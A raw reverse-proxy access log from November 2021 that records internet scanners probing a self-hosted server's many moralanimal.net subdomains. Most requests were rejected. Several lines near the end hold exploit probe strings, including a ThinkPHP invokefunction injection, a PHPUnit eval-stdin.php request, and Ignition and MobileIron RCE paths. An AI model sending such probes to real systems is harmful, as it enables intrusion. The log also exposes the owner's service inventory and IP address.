"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [11/Nov/2021:17:06:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.14.35.145] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [11/Nov/2021:17:06:40 +0000] 444 - GET https www.emby.moralanimal.net "/wp-login.php" [Client 3.17.10.130] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.emby.moralanimal.net/wp-login.php" [11/Nov/2021:18:59:03 +0000] 400 - HEAD http localhost "/" [Client 134.122.55.52] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:18:59:04 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 134.122.55.52] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:04 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 134.122.55.52] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:06 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 134.122.55.52] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:06 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 134.122.55.52] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:06 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 134.122.55.52] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:07 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 134.122.55.52] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:08 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 134.122.55.52] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:08 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 134.122.55.52] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:09 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 134.122.55.52] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36" "-" [11/Nov/2021:18:59:09 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 134.122.55.52] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36" "-" [11/Nov/2021:18:59:09 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 134.122.55.52] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:10 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 134.122.55.52] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:10 +0000] 400 - GET http 64.22.31.253 "/gemini-iptv/vod.json" [Client 134.122.55.52] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:11 +0000] 444 - GET https 64.22.31.253 "/gemini-iptv/vod.json" [Client 134.122.55.52] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 134.122.55.52] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:18:59:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 134.122.55.52] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [11/Nov/2021:19:04:56 +0000] 444 - GET https www.guacamole.moralanimal.net "/wp-login.php" [Client 18.222.89.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.guacamole.moralanimal.net/wp-login.php" [11/Nov/2021:19:14:54 +0000] 444 - GET https www.grocy.moralanimal.net "/wp-login.php" [Client 18.116.51.195] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.grocy.moralanimal.net/wp-login.php" [11/Nov/2021:19:20:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.146] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [11/Nov/2021:19:20:49 +0000] 400 - GET http 64.22.31.253 "/" [Client 185.180.143.146] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [11/Nov/2021:19:27:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.168.249.212] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [11/Nov/2021:19:35:56 +0000] 444 - GET https www.proxmox.moralanimal.net "/wp-login.php" [Client 3.134.113.67] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.proxmox.moralanimal.net/wp-login.php" [11/Nov/2021:19:56:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.9] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Nov/2021:20:06:10 +0000] 444 - GET https www.readarr.moralanimal.net "/wp-login.php" [Client 3.15.240.215] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.readarr.moralanimal.net/wp-login.php" [11/Nov/2021:20:10:27 +0000] 444 - GET https www.router.moralanimal.net "/wp-login.php" [Client 18.222.122.166] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.router.moralanimal.net/wp-login.php" [11/Nov/2021:20:12:34 +0000] 444 - GET https www.radarr.moralanimal.net "/wp-login.php" [Client 3.144.105.245] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.radarr.moralanimal.net/wp-login.php" [11/Nov/2021:20:21:42 +0000] 444 - GET https www.sabnzbd.moralanimal.net "/wp-login.php" [Client 3.22.234.96] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.sabnzbd.moralanimal.net/wp-login.php" [11/Nov/2021:20:35:18 +0000] 444 - GET https www.recipes.moralanimal.net "/wp-login.php" [Client 18.191.253.102] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.recipes.moralanimal.net/wp-login.php" [11/Nov/2021:20:54:16 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:20:54:17 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:21:04:26 +0000] 444 - GET https www.sonarr.moralanimal.net "/wp-login.php" [Client 18.188.37.160] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.sonarr.moralanimal.net/wp-login.php" [11/Nov/2021:21:05:11 +0000] 444 - GET https www.speedtest.moralanimal.net "/wp-login.php" [Client 3.17.184.40] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.speedtest.moralanimal.net/wp-login.php" [11/Nov/2021:21:44:29 +0000] 444 - GET https www.stash.moralanimal.net "/wp-login.php" [Client 3.12.164.167] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.stash.moralanimal.net/wp-login.php" [11/Nov/2021:21:56:27 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Nov/2021:21:56:27 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Nov/2021:21:56:27 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Nov/2021:21:56:27 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Nov/2021:21:56:27 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Nov/2021:21:56:27 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Nov/2021:22:03:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.161.24.64] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:22:35:24 +0000] 444 - GET https www.trilium.moralanimal.net "/wp-login.php" [Client 3.22.74.156] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.trilium.moralanimal.net/wp-login.php" [11/Nov/2021:22:40:46 +0000] 444 - GET https www.tpm.moralanimal.net "/wp-login.php" [Client 18.218.21.165] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.tpm.moralanimal.net/wp-login.php" [11/Nov/2021:22:55:35 +0000] 444 - GET https www.traefik.moralanimal.net "/wp-login.php" [Client 18.191.231.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.traefik.moralanimal.net/wp-login.php" [11/Nov/2021:23:08:55 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:23:08:56 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:23:42:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 191.232.38.25] [Length 0] [Gzip -] "-" "-" [12/Nov/2021:00:35:42 +0000] 444 - GET https www.whoami.moralanimal.net "/wp-login.php" [Client 18.188.234.184] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.whoami.moralanimal.net/wp-login.php" [12/Nov/2021:01:02:29 +0000] 444 - GET https www.wiki.moralanimal.net "/wp-login.php" [Client 3.23.60.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.wiki.moralanimal.net/wp-login.php" [12/Nov/2021:01:03:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Nov/2021:01:05:32 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:01:05:32 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:01:10:11 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:01:10:11 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:01:17:40 +0000] 444 - GET https www.yacht.moralanimal.net "/wp-login.php" [Client 18.119.167.55] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.yacht.moralanimal.net/wp-login.php" [12/Nov/2021:02:43:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.44] [Length 0] [Gzip -] "-" "-" [12/Nov/2021:02:43:24 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "-" "-" [12/Nov/2021:02:43:25 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [12/Nov/2021:03:09:02 +0000] 400 - GET http 64.22.31.253 "/" [Client 198.98.49.124] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [12/Nov/2021:03:18:23 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:03:18:23 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:03:40:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.173.35.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [12/Nov/2021:04:27:29 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 34.86.35.17] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [12/Nov/2021:05:43:15 +0000] 400 - GET https localhost "/N2we" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [12/Nov/2021:05:47:01 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [12/Nov/2021:06:20:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [12/Nov/2021:06:46:31 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 198.98.49.124] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [12/Nov/2021:07:44:59 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.189] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Nov/2021:09:53:19 +0000] 444 - GET https 139.162.113.11 "/" [Client 142.93.163.195] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729 Safari/537.36 OPR/57.0.3098.106" "-" [12/Nov/2021:10:06:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [12/Nov/2021:10:59:04 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:10:59:04 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:11:12:09 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:11:12:09 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:11:32:14 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:11:32:14 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:12:00:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.144] [Length 0] [Gzip -] "-" "-" [12/Nov/2021:12:00:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.144] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [12/Nov/2021:12:00:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.144] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [12/Nov/2021:12:53:57 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:12:53:57 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:13:04:58 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Nov/2021:13:04:58 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Nov/2021:13:04:58 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Nov/2021:13:15:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [12/Nov/2021:13:15:16 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211112211247" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [12/Nov/2021:13:28:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Nov/2021:13:37:00 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:13:37:00 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:14:27:40 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.209.184] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Nov/2021:14:33:16 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:14:33:16 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:16:20:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Nov/2021:16:49:10 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Nov/2021:16:49:10 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Nov/2021:16:49:10 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Nov/2021:18:59:16 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Nov/2021:18:59:16 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Nov/2021:18:59:17 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Nov/2021:18:59:17 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Nov/2021:18:59:20 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [12/Nov/2021:18:59:21 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Nov/2021:18:59:23 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Nov/2021:18:59:25 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Nov/2021:18:59:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Nov/2021:18:59:36 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [12/Nov/2021:19:01:28 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:19:01:28 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:19:55:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.72.127.190] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3054.97 Safari/537.32" "-" [12/Nov/2021:19:55:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.72.127.190] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3054.97 Safari/537.32" "-" [12/Nov/2021:20:10:57 +0000] 444 - GET https whoami.moralanimal.net 